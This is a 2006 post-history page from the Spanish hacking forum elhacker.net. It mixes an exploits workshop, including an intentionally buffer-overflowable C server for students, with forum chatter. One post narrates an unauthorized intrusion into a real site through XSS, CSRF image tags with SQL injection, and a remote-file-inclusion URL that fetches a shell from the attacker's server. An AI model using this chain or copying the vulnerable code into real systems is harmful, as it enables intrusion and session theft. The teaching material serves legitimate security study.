elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 [178] 179 180 181
1771  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Iconos nuevos. Que opinan? en: 27 Enero 2006, 01:41 am
:s :( nop.. a mi tmpco me encantan

Saludos!!
1772  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Humor Amarillo (Actualizado 7-01-05) en: 24 Enero 2006, 00:44 am
enviado de: osamaenelcielo??@??????.???
para: mi xD
Citar
Hola chico¡¡¡
me llamo Osama
queria saber si tu podias facilitarme 15 cuentas de correo electrónico en GMail y 31 en Hotmail¡¡¡

hey¡¡ y no soy bin laden eee¡¡
pero te pago, vamos, que nada es gratis.

tu solo dame tu numero de tarjeta de credito, con tus datos, y mañana mismo te deposito mil dolares en efectivo¡¡¡¡

ey¡¡¡ pero eso no es todo, despues de que me des las cuentas te doy 170,000 dolaresssssss eee nada mal no¡¡¡

mira contactamé aca güero
osamaenelcielo??@???????.???

te vas a hacer millonario morro¡¡¡¡¡

asi mejoras esta pagína y pones unos lanzadores que BIEN FALTAN¡¡¡¡¡¡¡¡¡¡¡¡¡

mucho gusto Sr.hacker, que te vaya chulisimo¡¡¡¡¡¡¡¡

eyyyy¡¡¡¡
comentarios sobran..
eyy!¡ xD
1773  Seguridad Informática / Bugs y Exploits / Re: [<TALLER>] Introducción a Bugs y Exploits en: 21 Enero 2006, 02:40 am
Nivel Web

Hola.
Yo sé que el tema pasado fue un poco complicado, pero eso fue una introducción a overflows, mas adelante veremos mas afondo como funciona cada uno, y sus ejemplos, y realmente era para que leyeran un poco sobre eso.. jeje.

Hoy veremos un poco de bugs a nivel web.

No les expliaré que es XSS ni SQL Inj., ni RFI, etc.. esto es mas bien un poco de teoria, y practica sobre de donde vienen estos bugs.

Los bugs a nivel web, son básicamente errores que por su naturaleza, son muy dificiles de controlar.
ya que en si, la mayoria de las veces no bloqueas el error, sino que mas bien, limpias al usuario.

es como:
Tenemos un millon de dolares en una mesa en mi casa, pero para evitar que se lo roben, solo dejo entrar a personas de confianza.

:) sin ofender a nadie.. eso es una idiotes.

asi funcionan a grandes rasgos, las vulnerabilidades de:
XSS Cross Site Scripting
SQL Inj. SQL Injection
RFI Remote File Inclusion
RCE Remote Comand Execution

Pero, pues que podemos hacer..

miren, haber si le trae recuerdos a alguien:

Cita de: EnglishTeacher
Fill in the blanks:

1.- The dog cant, enter to the house, it only can be in _____ house.

2.- Everybody is welcome to our house, this is our adress: ______.

3.- My name is _____, and I am from México.


Como, Ingles básico 1, o no se jaja.

Un alumno cualquiera contestaria:

1.- The dog cant, enter to the house, it only can be in its house.

2.- Everybody is welcome to our house, this is our adress: Evergreen No. 123, SpringField.

3.- My name is Jose Matias, and I am from México.

Bueno ese jose matias es como que el matado del salón, pero aqui viene pepito, el astuto.

1.- The dog cant, enter to the house, it only can be in the teacher's house.

2.- Everybody is welcome to our house, this is our adress: Afganistan, Kabul, CIA-HQ Basement. Att. Osama.

3.- My name is George W. Bush, and I hate you.
Well I am Fox
, and I am from México.

:P
bueno.. espero hayan entendido el concepto.
la magia esta en introducir cosas que no deberian introducirse.

En SQL Iny y RCE. lo que haces es introducir mas comandos de los que se supone que puedes, al dejarte introducir una variable, metes la variable, y despues metes comandos :P.

En RFI y XSS. lo que haces es meter cosas donde no van!!
metes una url, donde va un archivo, metes un tag donde va tu nombre etc..

Miren.
Ejemplo de SQL Inyection:
nos dejan meter la variable $modelo
y esta se usa aqui:
Citar
SELECT * FROM autos WHERE modelo='$modelo';
Entonces, tu metes comandos despues de eso.. pero si los metes a pelo, la instrucción va a creer que las funciones que metes son parte de la variable, asi que primero hay que decirle, que la variable acaba en cierto punto, para eso metemos una comilla.. para que la instrucción diga, bueno, hata aqui acaba la variable, y despues le metes instrucciones, no me meteré, en que instrucciones, eso ya hay tutoriales de SQL y de SQL Inyection.


Ejemplo de RFI:

el programa dice:
Cargar las variables donde estan los idiomas de la pagina que esta en la variable idioma, por ejemplo, idioma=spanish.php
entonces, nosotros vemos eso, y como sabemos que lo que hay en idioma, se va a incluir como instrucciones, ponemos nuestra web, con instrucciones que nos den control total de la página.

como siempre les dejo tarea.
Ejercicio
Y no es de hacer cosas en programas ya hechos.. para eso esta www.securityfocus.com/bid su tarea es de concepto, deben de hacer algo que se necesita para explotar genericamente todas las aplicaciones.

Deben hacer que el siguiente texto hable de lo siguiente:
  • Sobre que significa katafixia
  • Sobre cuando fue el descubrimiento de américa
  • Sobre cuantos peces hay en el mar
Lo interesante, es que solo puede hablar de eso, no puede hablar de ninguna otra cosa (es decir, el que lea esto, no debe saber que diablos es kokosteoposis).

este es el texto, donde vean un [?] pueden insertar cualquier cosa, de no mas de 25 caracteres, y no menos de 3.

Cita de: Alguien
Pese a que en nuestro país [?] la osteoporosis es un problema [?] importante y muy difundido, mas grave lo es la kokosteoposis [?], un padecimiento oseo, originado por una mala [?] nutrición.

Se calcula que en el territorio [?] mexicano [?], existen mas de 24.5 millones de personas con estos problemas, y solo 150,000 reciben [?] tratamiento.

La [?] Comop, dice que [?] 36,500 personas se fracturan al año, y la mitad, se muere en el transcurso del año entrante, y del [?] 50% restante la mitad queda discapacitada y dependiente de familares y amigos.

Como se puede ver [?] los problemas de desmineralización no solo [?] afectan a personas de edad [?] avanzada, pues muchos jovenes [?] la padecen.

El que de la mejor respuesta, gana que su post no se borre, igual que el del primer post :P

El próximo capitulo será de ASM, y BASIC.. para que vean masomenos como funciona su compu, y podamos reabordar el tema de overflows..

Hay documentación, en el foro de cursos y documentación, www.elhacker.net y en google.

Saludos!!

***--EDITADO--***
Hola, parece que el anterior estaba fuera de las capacidades contextuales de hacer algo con mucho sentido.. asi que les subi el maximo a 25.. lo iba a poner en 30, pero bueno, soy un maldito. xD

Saludos!!
1774  Informática / Tutoriales - Documentación / Re: Tutorial de Inyección SQL en: 18 Enero 2006, 07:01 am
obvio no va a sacar fallo.. amenos que quieras buscar en:
///////
si hay una comilla xD esto no sirve de nada.

checa la liga de php.net.

antes de ponerlo lo hubieras probado en local jeje.

Saludos!!
1775  Informática / Tutoriales - Documentación / Re: Los Poderes Secretos de XSS (Cross Site Scripting) en: 16 Enero 2006, 09:57 am
XSS + SQL Iny + RFI

Encontré una Web que gracias a un bug de XSS econtre un SQL Inyection y despues un RFI, porque digo esto?
para poner como ejemplo que XSS si es un asunto serio.

El XSS se encontraba en un TAG Board, que esta en todas las web a las que entras en el sitio, es parecido a php_nuke.
lo unico que hice con mi script, es notificarme a cuales páginas entraban los usuarios, y guardaba todos los submits en cookies para despues mandarlas a mi log tambien.
(El robo de cookies no funcionaba, el sistema guardaba la ip en la sesión)
yo esperaba que el admin pusiera su pass, y listo :P, pero nunca paso esto.. :(, consegui de muchos usuarios mortales, talvez el admin ya tenia iniciada su sesion con cookies.. y no podia cerrarsela, porque tenia limite de longitud mi bug.
SIN embargo, aun sin conseguir el pass de admin sabia a que paginas entraba este.. era muy facil saberlo, porque todas estaban en la carpeta /admin/
Despues de andar monitoreando sus movimientos un buen rato, vi que cuando entraba a poner una noticia, se enviaba en Post un numero.
Si tuviera acceso a ese documento sin ser admin, me hubiera ahorrado muchos problemas, pero pues.. como la ven que no.
El script, no lo podia modificar, ni podia poner otro, asi que debia encontrar una manera de enviar la información.
El antiguo bug de GET=POST en php, me ayudo.
Este sitio tenia foro, asi que lo unico que debi hacer fue:
(Modificado obvio!!)
Código:
Hola, me podrias orientar sobre como ser administraor de este foro?

Saludos
::wink::[img]http://site.com/admin/news.php?nid='&tno=abc&mno=abc&tn=23[/img]

nid es donde se guardaba el numero, tno el titulo mno es el mensaje y tn es el tema, lo puse en el ultimo para que no llamara la atencion.

Si se creaba la noticia era porque no habia inyección, si no se creaba, era porque si habia.

Ahora, esto parece una inyección mas dificil que un blind no? jaja
ahi fue donde entro el RFI.
Al parecer si habia inyección SQL, pero no se como diablos estabala sentencia que se creo la noticia, pero en el titulo se guardo (modificado):
Citar
Warning: Invalid Socket Stream /news/23th.php
ese 23 es de el tema, :P
Solo tuve que mandar otro MP al admin, ahora preguntandole, porque no me respondio mi post de quiero ser admin xD.
pero ahora con esta imagen:
Código:
http://site.com/admin/news.php?nid='&tno=abc&mno=abc&tn=http%3A//miserv.com/rfi/sh.txt?
el ? del final es porque el script agrega th.php al final
:P listo, ahora entraba con method POST y una variable en un formulario ya diseñado a:
http://site.com/index.php
y se creaba una consola de shell.
NO hice deface. yo estoy encontra de los defaces.
no es la gran cosa, es como cualquier 0wn3d, pero quize publicarlo, porque se me hizo gracioso, como este ataque fue de un tipo a otro, sin quererlo realmente.

Este sistema web es independiente, pero dicen que lo quieren vender jeje, si lo saca.. tendra los primeros 3 bug a los 15 segundos xD


Saludos!!
1776  Informática / Tutoriales - Documentación / Re: Tutorial de Inyección SQL en: 16 Enero 2006, 02:56 am
Y con esto te puedes cargar las mysql inyection:
Citar
@set_magic_quotes_runtime(0);
Además de con esto:
Código:
function limpieza1($valor) 
{
$valor = str_replace($valor,'"',"//////");
$valor = str_replace($valor,"'","//////");
$valor = str_replace($valor,"@","//////");
$valor = str_replace($valor,"or","//////");
$valor = str_replace($valor,"UNION","//////");
$valor = str_replace($valor,"SELECT","//////");
$valor = str_replace($valor,"%2527","//////");
$valor = str_replace($valor,"%2725","//////");
$valor = str_replace($valor,"%20","//////");
return $valor;
}
Saludos ::)
xD
http://mx2.php.net/str_replace
la sintaxis que usas esta completamente mal.

seria algo asi:
$valor = str_replace("cosa-mala","//////",$valor);

::) xD

Saludos!!
1777  Seguridad Informática / Bugs y Exploits / Re: [<TALLER>] Introducción a Bugs y Exploits en: 14 Enero 2006, 03:47 am
Segunda Sesión

Tipos de Bugs:

Nivel Aplicación
Nivel Web

Esta sesión nos centraremos en:
Nivel Aplicación se refiere a BoF, HoF, y FSoF.

Este taller es de práctica, anexo documentación, porque la info que daré aqui no es suficiente.

los BoF son vulnerabilidades que se dan porque el programador, al calcular la longitud de memoria asignada a tal variable, permite que el usuario meta mas de lo permitido, esto es porque en C, por ejemplo, al meter asi:
scanf("%s",string);
se empiezan a guardar en posiciones despues de la direccion de memoria guardada, asi que no hay algo que le diga alto.

si esta información se guarda en el Stack, parte de la memoria, donde se empujan funciones, se puede hacer que se ejecute código.
Mas info en:
http://en.wikipedia.org/wiki/Buffer_overflow

Los HoF, se crean cuando se usa, (de nuevo C), una  funcion, llamada malloc, que sire para especificar, cierta cantidad de memoria, lo que nos permite modificar variables.
Mas info en google xD

Los FSoF, son vulnerabilidades, al usar algo asi:
printf(variable);
documentación anexa.

Bueno.
deben leer y aparte si necesitan, investigar sobre estos temas, ya que los necesitaran para su siguiente tarea.

Esta es la historia de mi amigo Paco

Citar
Hoy Paco compró un software nuevo, llamado Apahuichtle, es un WebServer, y se supone que es anti todo, porque no soporta programación del lado del servidor.
Pero al pobre paco, lo han defaceado mil veces.
Lo unico que sabe, es que es una vulnerabilidad llamada BoF. busco en google que significa y encontro que es Birds of a Feather, asi que se ha puesto a borrar todos los archivos de pajaron que tenia.
Aun asi lo siguen defaceando.
Este es el codigo fuente de Apahichtle:
Código:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int g, char *f[])
{
    FILE *arc;
    char buf[255],xyz[255],c;
    int jk=0,i,cl;
    scanf("%s %s %s",buf,xyz,buf);
    scanf("%s",buf);
    scanf("%s",buf);
    scanf("%s",buf);
    scanf("%s",buf);
    strcpy(buf,"C:/WEB");
    strcat(buf,xyz);
    arc = fopen(buf, "r");
    if (arc == NULL){
       printf(" ARCHIVO INVALIDO %s",buf);
       return 0;
    }
    cl=0;
    c = getc(arc);
    while (c != EOF){
          printf("%c",c);
          if (c=='\n'){
             printf("\n");
             c = getc(arc);
             //printf("%d",cl);
             cl=0;
          }else{
                c = getc(arc);
                cl++;
          }
    }
    fclose(arc);
    return 0;
}

Paco me mando el instalador tambien, lo dejo anexo.

Debes encontrar todoss los bugs que puedas.
te recuerdo que debes leer la documentación, para que puedas encontrara las vulnerabilidades que contiene este programa.

1778  Programación / Ingeniería Inversa / Re: loving ingeniería inversa!!! en: 12 Enero 2006, 06:55 am
que hay de ricardo narvaja?
:P sus cursos estan muy bien, solo que hay algunas cosas mal en la adaptación del curso viejo a ollydbg (ESE NO LO HIZO ricnar) para un programa necesitas winnt, para el otro, necesitas win9x, jaja no se deciden!!
bueno, me despido

Saludos!!
1779  Seguridad Informática / Bugs y Exploits / FAQ de Vulnerabilidades en: 10 Enero 2006, 01:44 am
De momento este sera el FAQ de Vulnerabilidades, sobre vulnerabilidades aquí podrán preguntar Dudas Básicas de sobre Bug y Exploits a nivel de aplicación.

En caso de que sea alguna duda que sea necesario discutirla en el foro, el tema sera movido.

-Anon



Atención
ESTE TALLER CONSTARA DE MULTIPLES SESIONES, PREFIERO IR LENTO Y QUE TODOS ENTIENDAN.



Temario:
Introduccion a Bugs
Definición de Bugs/Exploit
Ejemplo vida real
Ejercicio



Bueno un taller, o como lo veo yo, es algo en donde aprendes de la práctica.
esta es la primera clase (xD) por decirle así, y es un poco para evitar que se vallan por el mal camino, no duden en dejar sus dudas aqui, pero recuerden que seran borradas, para poder dar continuidad al taller, sinembargo todas las dudas seran contestadas en el proximo post.

Primero, que es un Bug?
 contestare eso, diciendo que no es.
NO ES un programa que permite a un "supermegahx0r" entrar a la CIA
NO ES una linea de codigo
NO ES un insecto, ni lo que te estes imaginando que no sea:

un error de programación

eso es todo.. unos diran, UN FORO para eso.. un error de programación, ¿Porque no esta en la categoria de programación? ¿Porque esta en Hacking? ¿Porque todo parece girar alrededor de un Simple Error!!?

Bueno, porque es muy dificil hacer una aplicación GRANDE, segura.
por eso windows tiene errores, porque un grupo cerrado de personas, trabajan dia y noche para hacer muy bonito el sistema operativo, y cobrar sus cheques, pero en algun momento un programador se equivoca, no define bien una variabe, se salta un paso, no limpia una entrada, y un gusano infecta miles de millones de computadoras en 1 dia.

Yo he dicho, que debes saber mas que el propio programador, pero ahora veo que no es realmente así, porque hasta un programador, muy bueno, puede cometer un error, hasta ahora, no he descubierto ningun bug en ninuna aplicación que he hecho, el problema es que otros si lo han logrado.

en un lugar donde creo haber tomado todas las precauciones, siempre encuentran algo.. aveces es desesperante, pero de que alguien conocido encuentre el bug a alguien mas... prefiero yo saberlo, y así corregirlo.

ahora, donde entran los exploits?

los exploits, son otro programa, que usa este "bug" para hacer algo malo..

peinsen en que su programa es un niño chiquito y con amnesia.

deben de decirle que hacer bajo cada situación.

no abras la puerta a ningun extraño.
no dejes pasar a ninguna persona conocida con animales.
no dejes pasar a ninguna persona conocida con armas.

pero llega un señor, desconocido. con un changuito y una pistola, se queda afuera de la puerta, se presenta al niño, el niño lo conoce, y le da al changuito el arma, el changuito entra con el arma y despues el señor, como ya lo conoce el niño, entra, toma el arma una vez dentro, y lo roba.

ahora, el niño siempre siguio tus ordenes.
pero aun así, lo mataron.
¿suena muy fuerte verdad?
ahora que prefieres, que un compañero entre y en lugar de matar al niño, te hable por telefono, diciendote del problema, o.. que lo haga alguien desconocido?

bueno, no se si en alguna clase de computación, la primera clase no prenden las computadoras.. eso me pasa desde primaria.. nunca entendia porque, y hoy ustedes tendran la misma duda.

ustedes son ladrones de bancos, y quieren robar todo el dinero de el banco de la esquina, hay varias funciones (empleados), y estos se deben de encargar de evitar que tu salgas de ahi con dinero que no te pertenece, tu debes de crear un escenario en el cual, sin romper ninguna regla, salgas con el dinero en la mano.

estas son las funciones:

Código:
guardia_de_la_puerta (persona, accion){
si (accion == "entrar"){
 si (alarma_prendida && persona != policia){
 no dejar entrar;
 }sino{
 dejar entrar;
 }
}sino{
 si (alarma_prendida && persona != policia){
 no dejar salir;
 }sino{
 dejar salir;
 }
}
}

cajero(persona,dinero,cuenta){
 if(persona==cuenta.dueño){
 if(dinero<=cuenta.total){
 dar.dinero.a.persona;
 }sino{
 decir("No tiene saldo señor/señora");
 }
 }sino{
 alarma_prendida=true;
 }
}

ahora, tu solo puedes modificar la variable dinero, acción, y cuenta. no puedes falsificar persona.
tu solo tienes una cuenta de $500.00 y quieres sacar todo el dinero del banco. despues debes salir por donde esta el guardia de la puerta, (solo puedes salir por ahi, y DEBES salir)

por cierto, no eres policia.

Respuestas, escribanlas, pero no me las manden.. :) es solo para demostrar el concepto, la proxima sesión ya hablaremos de programación, haber cual es la respuesta mas creativa, el que gane, gana que su post se quede sin borrarse.


Saludos!!

ESTE TALLER CONSTARA DE MULTIPLES SESIONES, PREFIERO IR LENTO Y QUE TODOS ENTIENDAN.
1780  Foros Generales / Sugerencias y dudas sobre el Foro / Re: sistema de rangos en: 4 Enero 2006, 19:49 pm
Buang te falto moderador Local

Administrador
Coadmin
Moderador global
Moderador
Colaborador
Laboratorio
Taller php
Usuario normal
Visitante.
Páginas: 1 ... 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 [178] 179 180 181
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines